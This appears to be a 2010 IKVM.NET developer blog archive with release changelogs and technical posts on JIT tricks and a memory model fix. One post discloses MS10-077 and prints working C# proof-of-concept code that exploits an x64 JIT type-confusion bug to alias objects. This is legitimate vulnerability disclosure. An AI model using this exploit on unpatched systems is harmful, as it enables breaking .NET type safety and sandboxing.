# Wednesday, 01 December 2010
New Development Snapshot

Several bug fixes. I also figured out a way to workaround an annoying .NET 4 x64 JIT bug without any significant performance impact. Marek Safar has started on porting gmcs to IKVM.Reflection and that triggered some IKVM.Reflection bug fixes and improvements.

  • Fixed regression in Throwable.printStackTrace(). Exception cause in stack trace should use Throwable.toString() not System.Exception.ToString().
  • Add support for serializing .NET exceptions in Java. We don't serialize the actual object, but a placeholder instead, to avoid having to implement full .NET serialization interop.
  • File.lastModified() should return 0 for non-existing files. Fix for #3111432. Thanks to Stephen White for the patch.
  • Added workaround for .NET 4 x64 JIT bug.
  • Optimized thread creation.
  • Optimized ProtectionDomains created for .NET assemblies to be more lazy.
  • Made assembly Java class loader construction lazy.
  • Removed trace messages that don't add much value but do cause the tracer to needlessly read configuration data early in initialization.
  • Fixed AccessController.doPrivileged() bug that caused context to be ignored.
  • Removed implementation specific methods from top of stack trace for threads started from Java.
  • UnauthorizedAccessException caused by already existing file or directory should cause createFileExclusively() to return false instead of throwing an exception.
  • File.canWrite() should always return true for directories (on Windows).
  • Fixed regression. Don't call GetIPv6Properties() if IPv6 isn't available.
  • AWT fixes.
  • IKVM.Reflection: Added IKVM.Reflection.Missing type. Thanks to Marek Safar for pointing this out.
  • IKVM.Reflection: Fixed ParameterInfo.RawDefaultValue to return Missing.Value if the parameter is optional, but doesn't have a default and to return null, if the parameter isn't optional (and doesn't have a default).
  • IKVM.Reflection: Added AssemblyBuilder.__DefineIconResource() API.
  • Added -win32icon:<file> option to ikvmc.
  • IKVM.Reflection: Added ModuleBuilder.__Save() to support -target:module option better.
  • Changed ikvmc to use new ModuleBuilder.__Save() instead of workaround of deleting the manifest module after saving the assembly.
  • Added support for assembly custom attributes in combination with -target:module.
  • IKVM.Reflection: Added AssemblyBuilder.__AddModule() to allow pre-existing modules to be linked in.
  • IKVM.Reflection: Fixed RawModule.GetReferencedAssemblies() to work for non-manifest modules as well.
  • IKVM.Reflection: Added API to query placeholder assembly custom attributes in a module.
  • Fixed Thread.stop() race condition.
  • Implemented java.awt.Font.createFont().
  • Fixed .NET 4 security attribute regressions.

Binaries available here: ikvmbin-0.45.3987.zip

Wednesday, 01 December 2010 09:46:41 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]
# Sunday, 21 November 2010
How to Detect if a Method is Overridden

Suppose you want to know if (the class of) a particular object overrides a virtual method. For an example of this see OpenJDK's Thread.isCCLOverriden() (line 1573).

In Java the obvious way to do this would be to use reflection. On the CLR there is another way that is both more accurate1 and more efficient.

Here's the MSIL method from IKVM's java.lang.Thread.isCCLOverridden() implementation:

.method private hidebysig static bool isCCLOverridden(class java.lang.Thread A_0) cil managed
{
  ldftn      instance class java.lang.ClassLoader java.lang.Thread::getContextClassLoader()
  ldarg.0
  ldvirtftn  instance class java.lang.ClassLoader java.lang.Thread::getContextClassLoader()
  ceq
  ldftn      instance void java.lang.Thread::setContextClassLoader(class java.lang.ClassLoader)
  ldarg.0
  ldvirtftn  instance void java.lang.Thread::setContextClassLoader(class java.lang.ClassLoader)
  ceq
  and
  ldc.i4.0
  ceq
  ret
}

Instead of running a zillion instructions and accessing a lot of cold data for reflection, this simply leverages the information the JIT already has about virtual methods.

Here's the x86 code this turns into:

  push        ebp 
  mov         ebp,esp 
  push        esi 
  push        ebx 
  mov         esi,ecx 
  push        258F58h 
  mov         ecx,esi 
  mov         edx,259240h 
  call        JIT_VirtualFunctionPointer
  mov         edx,25DCA0h 
  cmp         eax,edx 
  sete        bl 
  movzx       ebx,bl 
  push        2591A0h 
  mov         ecx,esi 
  mov         edx,259240h 
  call        JIT_VirtualFunctionPointer
  mov         edx,25DCB0h 
  cmp         eax,edx 
  sete        al 
  movzx       eax,al 
  and         ebx,eax 
  sete        al 
  movzx       eax,al 
  pop         ebx 
  pop         esi 
  pop         ebp 
  ret

To get an idea what JIT_VirtualFunctionPointer does, take a look at the Shared Source CLI.

On the CLR, in the common case it only executes about 40 instructions.

The downside to this method is that it only works if you have an object instance. Although you could use FormatterServices.GetUninitializedObject() to create an instance.

Why Optimize This?

In the OpenJDK code, isCCLOverridden() is only called if a SecurityManager is installed, but I wanted to use it always to avoid calling getContextClassLoader() during thread construction, because that would trigger the system class loader to be constructed and I my long term goal for IKVM is to make initialization more lazy to reduce the huge startup overhead.


1This method is more accurate (on the CLR) because you don't need to worry about non-virtual methods or virtual methods that are new (and hence don't override the base class virtual method) or explicit overrides that override a method but have a different name.

Update: See this article for a caveat.

Sunday, 21 November 2010 11:36:21 (W. Europe Standard Time, UTC+01:00)  #    Comments [2]
# Wednesday, 17 November 2010
New Development Snapshot

Time for a new snapshot.

Changes:

  • Added support for using MethodImplAttribute as a Java annotation.
  • Fixed class name resolution for xml remapping instructions.
  • Many AWT fixes.
  • Fixed xml remapper to interpret empty sig attribute on call as zero length argument list.
  • Added memory barrier after volatile stores.
  • Added optimization to remove redundant memory barriers.
  • Changed default assembly class loader instantiation to avoid security manager check.
  • Fixed ikvm.exe -D property name parsing to accept properties with equals sign in the name.
  • Fixed JdbcOdbc provider to use Invariant Culture for Decimal/BigDecimal conversion.
  • Fixed column type mapping bugs in JdbcOdbcResultSetMetaData.
  • Fixed resource (and virtual class file) loading regression that caused loading resources from assemblies with an underscore in the name to fail.

Binaries available here: ikvmbin-0.45.3973.zip

Wednesday, 17 November 2010 09:08:33 (W. Europe Standard Time, UTC+01:00)  #    Comments [2]
# Thursday, 11 November 2010
IKVM.NET 0.36 Update 3

On request of an IKVM.NET user still stuck on .NET 1.1 the memory model fix has been backported to 0.36.

Changes:

  • Changed version to 0.36.0.14.
  • Emit a memory barrier after volatile stores.

Binaries available here: ikvmbin-0.36.0.14.zip
Sources (+ binaries): ikvm-0.36.0.14.zip

Thursday, 11 November 2010 07:09:06 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]
# Monday, 01 November 2010
C# Async CTP

Last week at the PDC Microsoft released a CTP of the upcoming C# (and VB.NET) async feature. When you install the Async CTP and run the code below with the current IKVM.NET release you'll see something like this:

7
Downloaded 64803 bytes
13

This means that after the async operation completed the method resumed on another thread. However, if you get the current IKVM.NET code from cvs, you'll see:

7
Downloaded 64803 bytes
7

Via the magic of SynchronizationContext the method now resumes on the AWT event thread, if the await happened on that thread.

Here's the demo:

using System;
using System.Threading;
using System.Net;
using java.awt;
using java.awt.@event;

class AsyncDemo : Frame, ActionListener
{
  AsyncDemo()
  {
    var button = new Button("Click Me");
    button.addActionListener(this);
    add(button);
    pack();
    setVisible(true);
  }

  public async void actionPerformed(ActionEvent ae)
  {
    Console.WriteLine(Thread.CurrentThread.ManagedThreadId);
    var wc = new WebClient();
    var data = await wc.DownloadDataTaskAsync("http://weblog.ikvm.net/");
    Console.WriteLine("Downloaded {0} bytes", data.Length);
    Console.WriteLine(Thread.CurrentThread.ManagedThreadId);
  }

  static void Main()
  {
    new AsyncDemo();
  }
}

Monday, 01 November 2010 15:57:38 (W. Europe Standard Time, UTC+01:00)  #    Comments [2]
# Tuesday, 26 October 2010
How to Hack Your Own JIT Intrinsic

Yesterday I wrote about Thread.MemoryBarrier() and some of its performance characteristics. I wanted to do some benchmarking to see whether mfence really is faster than a locked memory operation, but instead of writing a microbenchmark (which I had already done) I wanted to run code that was a little bit more "real". So I came with a hack to allow mfence to be used in managed code. Please note that this is a hack and not something you should use outside of an experimental context. The code is available here.

The code includes a microbenchmark, but not the "real" benchmark (based on LinkedBlockingQueue) that I used.

I also tested a Pentium 4 class machine and a Core i7. On the Pentium 4 and my Core 2 Duo the mfence wins out signicantly, but on the Core i7 mfence is significantly slower, oddly enough.

How the Hack Works

The MemoryBarrierHack.cs file contains two classes, __Hack__DoNotUse and Program. The __Hack__DoNotUse class contains the MemoryBarrier method and a static constructor to patch the MemoryBarrier method. The MemoryBarrier method is patched to patch the call site of its caller and replace the call with an mfence and a mov al,imm8 as a filler. This means that when you want a memory barrier, you simply call the static method and when that call executes, the first time it will act as a memory barrier (because of the locked memory operation) and also patch the call so that the next time it will be an mfence instruction.

I built a modified IKVM runtime that uses this trick and used that to benchmark the LinkedBlockingQueue. On my system it showed a performance improvement of about 7% with mfence versus .NET 4.0's MemoryBarrier instrinsic.

Tuesday, 26 October 2010 11:50:03 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]
# Monday, 25 October 2010
Memory Model Fix

In last week's 0.44.0.6 update I fixed a memory model bug. In retrospect it was a pretty dumb bug, but in my defence, even the easy parts of memory models are still pretty subtle and when I started IKVM.NET both the Java and CLR memory models were not very well documented.

First of all, I should thank Staffan Ulfberg for filing an exceptionally high quality bug report.

Finding the Problem

After spending some quality time in Windbg looking at the crash dump and with the java.util.concurrent sources, I was eventually able to reproduce the problem on a single CPU quad core Xeon (but not on my Core 2 laptop). After it was reproducable I started pruning the repro to find the troublespot and eventually found this method:

java.util.concurrent.AbstractQueuedSynchronizer.java
public final boolean release(int arg) {
  if (tryRelease(arg)) {
    Node h = head;
    if (h != null && h.waitStatus != 0)
      unparkSuccessor(h);
    return true;
  }
  return false;
}

My pruned version looked like this:

public final void release() {
  state = 0;
  Node h = head;
  if (h != null && h.waitStatus != 0)
    unparkSuccessor(h);
}

Both state and head are volatile fields. With this modified version the hang usually happened with in a second and I had also added a timeout to park so the problem could be seen repeatedly without restarting the process. After seeing this and thinking about it for a bit, I realized that if the read of head could be reordered with the write of state, that could cause the observed hang. To test that theory, I used Windbg to patch the running code to add an sfence instruction after the state = 0 store. That did indeed make the problem go away and replacing the sfence with three nop instructions made it reappear.

Time to read up on the memory models.

Java Memory Model

For the Java memory model, the JSR 133 Cookbook is a good place to start. It has a nice table that confirms that the reordering isn't allowed in Java:

Can Reorder 2nd operation
1st operation Normal Load
Normal Store
Volatile Load
MonitorEnter
Volatile Store
MonitorExit
Normal Load
Normal Store


No
Volatile Load
MonitorEnter
No No No
Volatile store
MonitorExit

No No

The yellow box clearly says No :-)

CLR Memory Model

The CLR memory model is summarized nicely in this blog post by Joe Duffy and he explicitly calls out: "With this model, the only true case where you’d truly need the strength of a full-barrier provided by Rule 4 is to prevent reordering in the case where a store is followed by a volatile load. Without the barrier, the instructions may reorder."

So that confirmed that I did indeed need to emit a memory barrier between a volatile store and a subsequent load. I modified the bytecode compiler to emit a call to Thread.MemoryBarrier() after every volatile store.

CLI Memory Model

I explicitly chose not to support the CLI memory model, because it is not very well specified and is impossible to test against. I don't know what memory model Mono implements, but I did find that Thread.MemoryBarrier() was not implemented for x86.

Thread.MemoryBarrier() Implementation Issues

I picked Thread.MemoryBarrier() for 0.44 because it was the easiest and lowest risk fix. An alternative would be to use Interlocked.Exchange() to write to a volatile field. On .NET 2.0, Thread.MemoryBarrier() is implemented as a native method that does more work than just the memory barrier, it also polls for GC and acts as a safe point. On .NET 4.0 it has been turned into a JIT intrinsic and the overhead is lower. Unfortunately, on my system, the .NET 4.0 memory barrier is still significantly slower than the HotSpot memory barrier (which uses mfence), but apparently the trade-off between mfence and a locked instruction is not trivial.

Optimization

In the 0.45 code (where there is now an MSIL optimization step), I added an optimization to remove redundant memory barriers. If multiple volatile stores are done in succession, only the last one will get a memory barrier.

Testing

Finally, here's a small test that reproduces the problem (on my Core 2 laptop):

class Rendezvous extends java.util.concurrent.atomic.AtomicInteger {
  private static final int PARTIES = 2;

  public final void await() {
    if (incrementAndGet() == PARTIES) {
      compareAndSet(PARTIES, 0);
      return;
    }
    while (get() != 0) ;
  }
}

public class test {
  static volatile int p1;
  static volatile int p2;
  static volatile int r1;
  static volatile int r2;
  static final Rendezvous rv1 = new Rendezvous();
  static final Rendezvous rv2 = new Rendezvous();

  public static void main(String[] args) {
    Thread t = new Thread() {
      public void run() {
        for (; ; ) {
          p1 = 0;
          rv1.await();

          p1 = 1;
          r1 = p2;

          rv2.await();
        }
      }
    };
    t.start();

    for (int i = 0; i < 1000000; i++) {
      p2 = 0;
      rv1.await();

      p2 = 1;
      r2 = p1;

      rv2.await();

      if (r1 == 0 && r2 == 0)
        System.out.println("Oops! i = " + i);
    }

    t.stop();
  }
}

Monday, 25 October 2010 08:58:57 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]
# Friday, 22 October 2010
MS10-077 Vulnerability Details

Last week Microsoft released MS10-077. Here are the details.

Coincidentally I found this vulnerability in the .NET 4.0 RC on the day that .NET 4.0 went RTM (April 12, 2010) and the next day confirmed that RTM was also affected and reported it to MSRC.

It's not really a very interesting vulnerability, just a bug in an optimization that the x64 JIT does. Here's the code to exploit it:

using System;
using System.Runtime.CompilerServices;
class Union1
{
  internal volatile int i;
  internal volatile int j;
}
class Union2
{
  internal volatile object o;
  internal volatile int[] arr;
}
class Program
{
  static Union1 union1 = new Union1();
  static Union2 union2;
  class Base
  {
    public virtual Base Get()
    {
      return null;
    }
  }
  class Derived : Base
  {
    public Union2 i;
  }
  class MyDerived : Derived
  {
    public override Base Get()
    {
      return new MyBase();
    }
  }
  class MyBase : Base
  {
    object foo = union1;
  }
  [MethodImpl(MethodImplOptions.NoInlining)]
  static void x64_JIT_Bug(Derived d)
  {
    Base b = d;
  loop:
    if (b != null)
    {
      if (b is Derived)
      {
        Oops((Derived)b);
      }
      b = b.Get();
      goto loop;
    }
  }
  static void Oops(Derived d)
  {
    union2 = d.i;
  }
  static void Main()
  {
    x64_JIT_Bug(new MyDerived());
    Console.WriteLine(union1);
    Console.WriteLine(union2);
  }
}

The bug is in x64_JIT_Bug. The "b is Derived" test and "(Derived)" cast are incorrectly optimized away.

Friday, 22 October 2010 14:02:12 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
IKVM.NET 0.44 Update 1 RC 0

Time for a refresh of 0.44 with some bug fixes.

Changes:

  • Changed version to 0.44.0.6
  • Backported various build system improvements.
  • Backported IKVM.Reflection ILGenerator exception table sorting bug fix (when running on Mono).
  • Backported Mono 2.8 mcs build workarounds.
  • Backported support for boolean, byte, char and short non-final static field constant attributes.
  • Backported core assembly detection fix.
  • Backported fix to make sure that ikvmc (and ikvmstub) can find assemblies that are part of a multi assembly (shared class loader) group (if the assembly is in the same directory as the main assembly of the group).
  • Backported fix for regression in stack trace printing of .NET (not remapped) exceptions introduced in 0.44. The .NET stack trace should not be included in the message.
  • Backported fix for ikvmc sometimes incorrectly handling InternalsVisibleToAttributes in multi assembly builds.
  • Backported fix for regression introduced with fault handlers. Exception handlers inside fault handlers could be ignored.
  • Backported fix for #3086040. Volatile stores require a memory barrier.

Binary available here: ikvmbin-0.44.0.6.zip

Sources: ikvmsrc-0.44.0.6.zip, openjdk6-b18-stripped.zip

Friday, 22 October 2010 10:25:42 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]
# Friday, 15 October 2010
New Development Snapshot

Time for a new snapshot. No major theme this time, but lots of bug fixes and some new infrastructure for doing more MSIL optimizations. Volker added the Nimbus L&F.

Changes:

  • Moved local variable analysis from verifier into a separate pass.
  • Restructured method analyzer/verifier to make data flow more obvious and keep less data alive during compilation.
  • Various minor refactorings and clean up.
  • Changed workaround for gmcs inability to properly deal with two-pass compilation of mutually dependant assemblies to use reflection, because the previous workaround now also fails on Mono 2.8.
  • Fixed reflection method invocation issue: Always wrap InvocationTargetException in another InvocationTargetException, to handle the case where a method is recursively calling itself.
  • Added support for boolean, byte, char and short non-final static field constant attributes.
  • Implemented create() for ButtonPeer and LabelPeer.
  • Implemented first stab at converting suitable fault blocks into finally blocks.
  • Changed CodeEmitter to build intermediate store of MSIL code to allow post-processing optimization steps.
  • Added endfinally opcode support to xml remapper.
  • Changed xml remapper to require explicit exits in exception blocks.
  • Moved ikvmc core assembly detection to the right place, to avoid problems when a non-main assembly of the core assembly set is explicitly referenced.
  • Fix to make sure that ikvmc (and ikvmstub) can find assemblies that are part of a multi assembly (shared class loader) group (if the assembly is in the same directory as the main assembly of the group).
  • Fix a rounding problem with FontMetrics.
  • Implemented createCompatibleVolatileImage() for Nimbus.
  • Implemented Graphics.setPaint() with a LinearGradientPaint for Nimbus.
  • Added Nimbus L&F.
  • Fixed threading problem in font metrics code.
  • Fixed regression in stack trace printing of .NET (not remapped) exceptions introduced in 0.44. The .NET stack trace should not be included in the message.
  • Fixed ikvmc bug. Before saving any of the output assemblies, we should first finish all of them (because InternalsVisibleToAttributes may be added as a side effect of compiling code in another assembly).
  • Fixed regression in SocketInputStream.read(). The offset into the byte array was ignored.
  • Use renderings hints of FontMetrics for drawGlyphVector.
  • Fixed regression introduced with fault handlers. Exception handlers inside fault handlers could be ignored.
  • Added some experimental MSIL optimizations to CodeEmitter. They can be enabled by setting the IKVM_EXPERIMENTAL_OPTIMIZATIONS environment variable.
  • Added error handling for -remap file errors to ikvmc.
  • IKVM.Reflection: Fixed ILGenerator to throw a NotSupportException if a branch offset doesn't fit (i.e. when a short form branch is used inappropriately).
  • IKVM.Reflection: Added exception message for backward branch constraints violations.
  • IKVM.Reflection: Fixed ILGenerator to properly sort exception table when running on Mono.

Binaries available here: ikvmbin-0.45.3940.zip

Friday, 15 October 2010 06:32:16 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]